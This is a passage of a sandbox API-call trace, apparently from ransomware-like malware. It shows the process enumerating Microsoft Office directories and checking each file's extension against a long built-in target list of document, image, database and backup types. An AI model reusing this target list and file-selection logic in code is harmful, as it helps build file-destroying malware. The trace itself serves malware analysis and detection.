[0269.620] lstrlenW (lpString=".icb") returned 4 [0269.620] lstrcmpiW (lpString1=".icb", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".ics") returned 4 [0269.620] lstrcmpiW (lpString1=".ics", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".iff") returned 4 [0269.620] lstrcmpiW (lpString1=".iff", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".inc") returned 4 [0269.620] lstrcmpiW (lpString1=".inc", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".indd") returned 5 [0269.620] lstrcmpiW (lpString1=".indd", lpString2="0.MML") returned -1 [0269.620] lstrlenW (lpString=".ini") returned 4 [0269.620] lstrcmpiW (lpString1=".ini", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".iqy") returned 4 [0269.620] lstrcmpiW (lpString1=".iqy", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".j2c") returned 4 [0269.620] lstrcmpiW (lpString1=".j2c", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".j2k") returned 4 [0269.620] lstrcmpiW (lpString1=".j2k", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".java") returned 5 [0269.620] lstrcmpiW (lpString1=".java", lpString2="0.MML") returned -1 [0269.620] lstrlenW (lpString=".jp2") returned 4 [0269.621] lstrcmpiW (lpString1=".jp2", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".jpc") returned 4 [0269.621] lstrcmpiW (lpString1=".jpc", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".jpe") returned 4 [0269.621] lstrcmpiW (lpString1=".jpe", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".jpeg") returned 5 [0269.621] lstrcmpiW (lpString1=".jpeg", lpString2="0.MML") returned -1 [0269.621] lstrlenW (lpString=".jpf") returned 4 [0269.621] lstrcmpiW (lpString1=".jpf", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".jpg") returned 4 [0269.621] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".jpx") returned 4 [0269.621] lstrcmpiW (lpString1=".jpx", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".js") returned 3 [0269.621] lstrcmpiW (lpString1=".js", lpString2="MML") returned -1 [0269.621] lstrlenW (lpString=".jsf") returned 4 [0269.621] lstrcmpiW (lpString1=".jsf", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".json") returned 5 [0269.621] lstrcmpiW (lpString1=".json", lpString2="0.MML") returned -1 [0269.621] lstrlenW (lpString=".jsp") returned 4 [0269.621] lstrcmpiW (lpString1=".jsp", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".kdc") returned 4 [0269.621] lstrcmpiW (lpString1=".kdc", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".kmz") returned 4 [0269.621] lstrcmpiW (lpString1=".kmz", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".kwm") returned 4 [0269.621] lstrcmpiW (lpString1=".kwm", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".lasso") returned 6 [0269.621] lstrcmpiW (lpString1=".lasso", lpString2="10.MML") returned -1 [0269.621] lstrlenW (lpString=".lbi") returned 4 [0269.621] lstrcmpiW (lpString1=".lbi", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".lgf") returned 4 [0269.621] lstrcmpiW (lpString1=".lgf", lpString2=".MML") returned -1 [0269.621] lstrlenW (lpString=".lgp") returned 4 [0269.622] lstrcmpiW (lpString1=".lgp", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".log") returned 4 [0269.622] lstrcmpiW (lpString1=".log", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".m1v") returned 4 [0269.622] lstrcmpiW (lpString1=".m1v", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".m4a") returned 4 [0269.622] lstrcmpiW (lpString1=".m4a", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".m4v") returned 4 [0269.622] lstrcmpiW (lpString1=".m4v", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".max") returned 4 [0269.622] lstrcmpiW (lpString1=".max", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".md") returned 3 [0269.622] lstrcmpiW (lpString1=".md", lpString2="MML") returned -1 [0269.622] lstrlenW (lpString=".mda") returned 4 [0269.622] lstrcmpiW (lpString1=".mda", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".mdb") returned 4 [0269.622] lstrcmpiW (lpString1=".mdb", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".mde") returned 4 [0269.622] lstrcmpiW (lpString1=".mde", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".mdf") returned 4 [0269.622] lstrcmpiW (lpString1=".mdf", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".mdw") returned 4 [0269.622] lstrcmpiW (lpString1=".mdw", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".mef") returned 4 [0269.622] lstrcmpiW (lpString1=".mef", lpString2=".MML") returned -1 [0269.622] lstrlenW (lpString=".mft") returned 4 [0269.622] lstrcmpiW (lpString1=".mft", lpString2=".MML") returned -1 [0269.623] lstrlenW (lpString=".mfw") returned 4 [0269.623] lstrcmpiW (lpString1=".mfw", lpString2=".MML") returned -1 [0269.623] lstrlenW (lpString=".mht") returned 4 [0269.623] lstrcmpiW (lpString1=".mht", lpString2=".MML") returned -1 [0269.623] lstrlenW (lpString=".mhtml") returned 6 [0269.623] lstrcmpiW (lpString1=".mhtml", lpString2="10.MML") returned -1 [0269.623] lstrlenW (lpString=".mka") returned 4 [0269.623] lstrcmpiW (lpString1=".mka", lpString2=".MML") returned -1 [0269.623] lstrlenW (lpString=".mkidx") returned 6 [0269.623] lstrcmpiW (lpString1=".mkidx", lpString2="10.MML") returned -1 [0269.623] lstrlenW (lpString=".mkv") returned 4 [0269.623] lstrcmpiW (lpString1=".mkv", lpString2=".MML") returned -1 [0269.623] lstrlenW (lpString=".mos") returned 4 [0269.623] lstrcmpiW (lpString1=".mos", lpString2=".MML") returned 1 [0269.623] lstrlenW (lpString=".mov") returned 4 [0269.623] lstrcmpiW (lpString1=".mov", lpString2=".MML") returned 1 [0269.623] lstrlenW (lpString=".mp3") returned 4 [0269.623] lstrcmpiW (lpString1=".mp3", lpString2=".MML") returned 1 [0269.623] lstrlenW (lpString=".mp4") returned 4 [0269.623] lstrcmpiW (lpString1=".mp4", lpString2=".MML") returned 1 [0269.623] lstrlenW (lpString=".mpeg") returned 5 [0269.623] lstrcmpiW (lpString1=".mpeg", lpString2="0.MML") returned -1 [0269.623] lstrlenW (lpString=".mpg") returned 4 [0269.624] lstrcmpiW (lpString1=".mpg", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".mpv") returned 4 [0269.624] lstrcmpiW (lpString1=".mpv", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".mrw") returned 4 [0269.624] lstrcmpiW (lpString1=".mrw", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".msg") returned 4 [0269.624] lstrcmpiW (lpString1=".msg", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".mxl") returned 4 [0269.624] lstrcmpiW (lpString1=".mxl", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".myd") returned 4 [0269.624] lstrcmpiW (lpString1=".myd", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".myi") returned 4 [0269.624] lstrcmpiW (lpString1=".myi", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".nef") returned 4 [0269.624] lstrcmpiW (lpString1=".nef", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".nrw") returned 4 [0269.624] lstrcmpiW (lpString1=".nrw", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".obj") returned 4 [0269.624] lstrcmpiW (lpString1=".obj", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".odb") returned 4 [0269.624] lstrcmpiW (lpString1=".odb", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".odc") returned 4 [0269.624] lstrcmpiW (lpString1=".odc", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".odm") returned 4 [0269.624] lstrcmpiW (lpString1=".odm", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".odp") returned 4 [0269.624] lstrcmpiW (lpString1=".odp", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".ods") returned 4 [0269.624] lstrcmpiW (lpString1=".ods", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".oft") returned 4 [0269.624] lstrcmpiW (lpString1=".oft", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".one") returned 4 [0269.624] lstrcmpiW (lpString1=".one", lpString2=".MML") returned 1 [0269.624] lstrlenW (lpString=".onepkg") returned 7 [0269.624] lstrcmpiW (lpString1=".onepkg", lpString2="E10.MML") returned -1 [0269.625] lstrlenW (lpString=".onetoc2") returned 8 [0269.625] lstrcmpiW (lpString1=".onetoc2", lpString2="CE10.MML") returned -1 [0269.625] lstrlenW (lpString=".opt") returned 4 [0269.625] lstrcmpiW (lpString1=".opt", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".oqy") returned 4 [0269.625] lstrcmpiW (lpString1=".oqy", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".orf") returned 4 [0269.625] lstrcmpiW (lpString1=".orf", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".p12") returned 4 [0269.625] lstrcmpiW (lpString1=".p12", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".p7b") returned 4 [0269.625] lstrcmpiW (lpString1=".p7b", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".p7c") returned 4 [0269.625] lstrcmpiW (lpString1=".p7c", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".pam") returned 4 [0269.625] lstrcmpiW (lpString1=".pam", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".pbm") returned 4 [0269.625] lstrcmpiW (lpString1=".pbm", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".pct") returned 4 [0269.625] lstrcmpiW (lpString1=".pct", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".pcx") returned 4 [0269.625] lstrcmpiW (lpString1=".pcx", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".pdd") returned 4 [0269.625] lstrcmpiW (lpString1=".pdd", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".pdf") returned 4 [0269.625] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".pdp") returned 4 [0269.625] lstrcmpiW (lpString1=".pdp", lpString2=".MML") returned 1 [0269.625] lstrlenW (lpString=".pef") returned 4 [0269.625] lstrcmpiW (lpString1=".pef", lpString2=".MML") returned 1 [0269.626] lstrlenW (lpString=".pem") returned 4 [0269.626] lstrcmpiW (lpString1=".pem", lpString2=".MML") returned 1 [0269.626] lstrlenW (lpString=".pff") returned 4 [0269.626] lstrcmpiW (lpString1=".pff", lpString2=".MML") returned 1 [0269.626] lstrlenW (lpString=".pfm") returned 4 [0269.626] lstrcmpiW (lpString1=".pfm", lpString2=".MML") returned 1 [0269.626] lstrlenW (lpString=".pfx") returned 4 [0269.626] lstrcmpiW (lpString1=".pfx", lpString2=".MML") returned 1 [0269.626] lstrlenW (lpString=".pgm") returned 4 [0269.626] lstrcmpiW (lpString1=".pgm", lpString2=".MML") returned 1 [0269.626] lstrlenW (lpString=".php") returned 4 [0269.626] lstrcmpiW (lpString1=".php", lpString2=".MML") returned 1 [0269.626] lstrlenW (lpString=".php3") returned 5 [0269.626] lstrcmpiW (lpString1=".php3", lpString2="0.MML") returned -1 [0269.626] lstrlenW (lpString=".php4") returned 5 [0269.626] lstrcmpiW (lpString1=".php4", lpString2="0.MML") returned -1 [0269.626] lstrlenW (lpString=".php5") returned 5 [0269.626] lstrcmpiW (lpString1=".php5", lpString2="0.MML") returned -1 [0269.626] lstrlenW (lpString=".phtml") returned 6 [0269.626] lstrcmpiW (lpString1=".phtml", lpString2="10.MML") returned -1 [0269.626] lstrlenW (lpString=".pict") returned 5 [0269.626] lstrcmpiW (lpString1=".pict", lpString2="0.MML") returned -1 [0269.626] lstrlenW (lpString=".pl") returned 3 [0269.626] lstrcmpiW (lpString1=".pl", lpString2="MML") returned -1 [0269.626] lstrlenW (lpString=".pls") returned 4 [0269.626] lstrcmpiW (lpString1=".pls", lpString2=".MML") returned 1 [0269.626] lstrlenW (lpString=".pm") returned 3 [0269.626] lstrcmpiW (lpString1=".pm", lpString2="MML") returned -1 [0269.626] lstrlenW (lpString=".png") returned 4 [0269.626] lstrcmpiW (lpString1=".png", lpString2=".MML") returned 1 [0269.626] lstrlenW (lpString=".pnm") returned 4 [0269.626] lstrcmpiW (lpString1=".pnm", lpString2=".MML") returned 1 [0269.626] lstrlenW (lpString=".pot") returned 4 [0269.626] lstrcmpiW (lpString1=".pot", lpString2=".MML") returned 1 [0269.627] lstrlenW (lpString=".potm") returned 5 [0269.627] lstrcmpiW (lpString1=".potm", lpString2="0.MML") returned -1 [0269.627] lstrlenW (lpString=".potx") returned 5 [0269.627] lstrcmpiW (lpString1=".potx", lpString2="0.MML") returned -1 [0269.627] lstrlenW (lpString=".ppa") returned 4 [0269.627] lstrcmpiW (lpString1=".ppa", lpString2=".MML") returned 1 [0269.627] lstrlenW (lpString=".ppam") returned 5 [0269.627] lstrcmpiW (lpString1=".ppam", lpString2="0.MML") returned -1 [0269.627] lstrlenW (lpString=".ppm") returned 4 [0269.627] lstrcmpiW (lpString1=".ppm", lpString2=".MML") returned 1 [0269.627] lstrlenW (lpString=".pps") returned 4 [0269.627] lstrcmpiW (lpString1=".pps", lpString2=".MML") returned 1 [0269.627] lstrlenW (lpString=".ppsm") returned 5 [0269.627] lstrcmpiW (lpString1=".ppsm", lpString2="0.MML") returned -1 [0269.627] lstrlenW (lpString=".ppt") returned 4 [0269.627] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0269.627] lstrlenW (lpString=".pptm") returned 5 [0269.627] lstrcmpiW (lpString1=".pptm", lpString2="0.MML") returned -1 [0269.627] lstrlenW (lpString=".pptx") returned 5 [0269.627] lstrcmpiW (lpString1=".pptx", lpString2="0.MML") returned -1 [0269.627] lstrlenW (lpString=".prn") returned 4 [0269.627] lstrcmpiW (lpString1=".prn", lpString2=".MML") returned 1 [0269.627] lstrlenW (lpString=".ps") returned 3 [0269.627] lstrcmpiW (lpString1=".ps", lpString2="MML") returned -1 [0269.627] lstrlenW (lpString=".psb") returned 4 [0269.627] lstrcmpiW (lpString1=".psb", lpString2=".MML") returned 1 [0269.627] lstrlenW (lpString=".psd") returned 4 [0269.627] lstrcmpiW (lpString1=".psd", lpString2=".MML") returned 1 [0269.627] lstrlenW (lpString=".pst") returned 4 [0269.627] lstrcmpiW (lpString1=".pst", lpString2=".MML") returned 1 [0269.627] lstrlenW (lpString=".ptx") returned 4 [0269.627] lstrcmpiW (lpString1=".ptx", lpString2=".MML") returned 1 [0269.627] lstrlenW (lpString=".pub") returned 4 [0269.627] lstrcmpiW (lpString1=".pub", lpString2=".MML") returned 1 [0269.628] lstrlenW (lpString=".pwm") returned 4 [0269.628] lstrcmpiW (lpString1=".pwm", lpString2=".MML") returned 1 [0269.628] lstrlenW (lpString=".pxr") returned 4 [0269.628] lstrcmpiW (lpString1=".pxr", lpString2=".MML") returned 1 [0269.628] lstrlenW (lpString=".py") returned 3 [0269.628] lstrcmpiW (lpString1=".py", lpString2="MML") returned -1 [0269.628] lstrlenW (lpString=".qt") returned 3 [0269.628] lstrcmpiW (lpString1=".qt", lpString2="MML") returned -1 [0269.628] lstrlenW (lpString=".r3d") returned 4 [0269.628] lstrcmpiW (lpString1=".r3d", lpString2=".MML") returned 1 [0269.628] lstrlenW (lpString=".raf") returned 4 [0269.628] lstrcmpiW (lpString1=".raf", lpString2=".MML") returned 1 [0269.628] lstrlenW (lpString=".rar") returned 4 [0269.628] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0269.628] FindNextFileW (in: hFindFile=0x3580f00, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x130a0400, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x130a0400, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x4c438, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.MML", cAlternateFileName="")) returned 0 [0269.628] FindClose (in: hFindFile=0x3580f00 | out: hFindFile=0x3580f00) returned 1 [0269.628] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x42b9060 | out: hHeap=0x4a0000) returned 1 [0269.628] FindNextFileW (in: hFindFile=0x3580980, lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUTOSHAP", cAlternateFileName="")) returned 1 [0269.628] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*", lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3581100 [0269.654] FindNextFileW (in: hFindFile=0x3581100, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0269.658] FindNextFileW (in: hFindFile=0x3581100, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3475600, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x51767f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3475600, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUTOSHAP.DLL", cAlternateFileName="")) returned 1 [0271.700] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x544ee410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64dbf390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64dbf390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0271.700] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c198900, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x544ee410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5c198900, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xd770, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Office.Infopath.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0271.715] FindNextFileW (in: hFindFile=0x3580980, lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x51fe2db0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x51fe2db0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0271.715] FindNextFileW (in: hFindFile=0x3580980, lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Analysis", cAlternateFileName="")) returned 1 [0271.745] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0271.745] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1ecf00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a1ecf00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x3bb60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ANALYS32.XLL", cAlternateFileName="")) returned 1 [0271.752] lstrlenW (lpString="ANALYS32.XLL") returned 12 [0271.761] lstrlenW (lpString=".1cd") returned 4 [0271.763] lstrcmpiW (lpString1=".1cd", lpString2=".XLL") returned -1 [0271.763] lstrlenW (lpString=".3ds") returned 4 [0271.763] lstrcmpiW (lpString1=".3ds", lpString2=".XLL") returned -1 [0271.767] lstrlenW (lpString=".3fr") returned 4 [0271.767] lstrcmpiW (lpString1=".3fr", lpString2=".XLL") returned -1 [0271.768] lstrlenW (lpString=".3g2") returned 4 [0271.769] lstrcmpiW (lpString1=".3g2", lpString2=".XLL") returned -1 [0271.772] lstrlenW (lpString=".3gp") returned 4 [0271.774] lstrcmpiW (lpString1=".3gp", lpString2=".XLL") returned -1 [0271.779] lstrlenW (lpString=".7z") returned 3 [0271.779] lstrcmpiW (lpString1=".7z", lpString2="XLL") returned -1 [0271.780] lstrlenW (lpString=".accda") returned 6 [0271.781] lstrcmpiW (lpString1=".accda", lpString2="32.XLL") returned -1 [0271.781] lstrlenW (lpString=".accdb") returned 6 [0271.781] lstrcmpiW (lpString1=".accdb", lpString2="32.XLL") returned -1 [0271.781] lstrlenW (lpString=".accdc") returned 6 [0271.781] lstrcmpiW (lpString1=".accdc", lpString2="32.XLL") returned -1 [0271.781] lstrlenW (lpString=".accde") returned 6 [0271.781] lstrcmpiW (lpString1=".accde", lpString2="32.XLL") returned -1 [0271.781] lstrlenW (lpString=".accdt") returned 6 [0271.781] lstrcmpiW (lpString1=".accdt", lpString2="32.XLL") returned -1 [0271.781] lstrlenW (lpString=".accdw") returned 6 [0271.781] lstrcmpiW (lpString1=".accdw", lpString2="32.XLL") returned -1 [0271.781] lstrlenW (lpString=".adb") returned 4 [0271.781] lstrcmpiW (lpString1=".adb", lpString2=".XLL") returned -1 [0271.781] lstrlenW (lpString=".adp") returned 4 [0271.781] lstrcmpiW (lpString1=".adp", lpString2=".XLL") returned -1 [0271.781] lstrlenW (lpString=".ai") returned 3 [0271.781] lstrcmpiW (lpString1=".ai", lpString2="XLL") returned -1 [0271.781] lstrlenW (lpString=".ai3") returned 4 [0271.781] lstrcmpiW (lpString1=".ai3", lpString2=".XLL") returned -1 [0271.781] lstrlenW (lpString=".ai4") returned 4 [0271.781] lstrcmpiW (lpString1=".ai4", lpString2=".XLL") returned -1 [0271.781] lstrlenW (lpString=".ai5") returned 4 [0271.781] lstrcmpiW (lpString1=".ai5", lpString2=".XLL") returned -1 [0271.781] lstrlenW (lpString=".ai6") returned 4 [0271.781] lstrcmpiW (lpString1=".ai6", lpString2=".XLL") returned -1 [0271.781] lstrlenW (lpString=".ai7") returned 4 [0271.781] lstrcmpiW (lpString1=".ai7", lpString2=".XLL") returned -1 [0271.781] lstrlenW (lpString=".ai8") returned 4 [0271.781] lstrcmpiW (lpString1=".ai8", lpString2=".XLL") returned -1 [0271.781] lstrlenW (lpString=".anim") returned 5 [0271.781] lstrcmpiW (lpString1=".anim", lpString2="2.XLL") returned -1 [0271.781] lstrlenW (lpString=".arw") returned 4 [0271.781] lstrcmpiW (lpString1=".arw", lpString2=".XLL") returned -1 [0271.781] lstrlenW (lpString=".as") returned 3 [0271.781] lstrcmpiW (lpString1=".as", lpString2="XLL") returned -1 [0271.782] lstrlenW (lpString=".asa") returned 4 [0271.782] lstrcmpiW (lpString1=".asa", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".asc") returned 4 [0271.782] lstrcmpiW (lpString1=".asc", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".ascx") returned 5 [0271.782] lstrcmpiW (lpString1=".ascx", lpString2="2.XLL") returned -1 [0271.782] lstrlenW (lpString=".asm") returned 4 [0271.782] lstrcmpiW (lpString1=".asm", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".asmx") returned 5 [0271.782] lstrcmpiW (lpString1=".asmx", lpString2="2.XLL") returned -1 [0271.782] lstrlenW (lpString=".asp") returned 4 [0271.782] lstrcmpiW (lpString1=".asp", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".aspx") returned 5 [0271.782] lstrcmpiW (lpString1=".aspx", lpString2="2.XLL") returned -1 [0271.782] lstrlenW (lpString=".asr") returned 4 [0271.782] lstrcmpiW (lpString1=".asr", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".asx") returned 4 [0271.782] lstrcmpiW (lpString1=".asx", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".avi") returned 4 [0271.782] lstrcmpiW (lpString1=".avi", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".avs") returned 4 [0271.782] lstrcmpiW (lpString1=".avs", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".backup") returned 7 [0271.782] lstrcmpiW (lpString1=".backup", lpString2="S32.XLL") returned -1 [0271.782] lstrlenW (lpString=".bak") returned 4 [0271.782] lstrcmpiW (lpString1=".bak", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".bay") returned 4 [0271.782] lstrcmpiW (lpString1=".bay", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".bd") returned 3 [0271.782] lstrcmpiW (lpString1=".bd", lpString2="XLL") returned -1 [0271.782] lstrlenW (lpString=".bin") returned 4 [0271.782] lstrcmpiW (lpString1=".bin", lpString2=".XLL") returned -1 [0271.782] lstrlenW (lpString=".bmp") returned 4 [0271.782] lstrcmpiW (lpString1=".bmp", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".bz2") returned 4 [0271.783] lstrcmpiW (lpString1=".bz2", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".c") returned 2 [0271.783] lstrcmpiW (lpString1=".c", lpString2="LL") returned -1 [0271.783] lstrlenW (lpString=".cdr") returned 4 [0271.783] lstrcmpiW (lpString1=".cdr", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".cer") returned 4 [0271.783] lstrcmpiW (lpString1=".cer", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".cf") returned 3 [0271.783] lstrcmpiW (lpString1=".cf", lpString2="XLL") returned -1 [0271.783] lstrlenW (lpString=".cfc") returned 4 [0271.783] lstrcmpiW (lpString1=".cfc", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".cfm") returned 4 [0271.783] lstrcmpiW 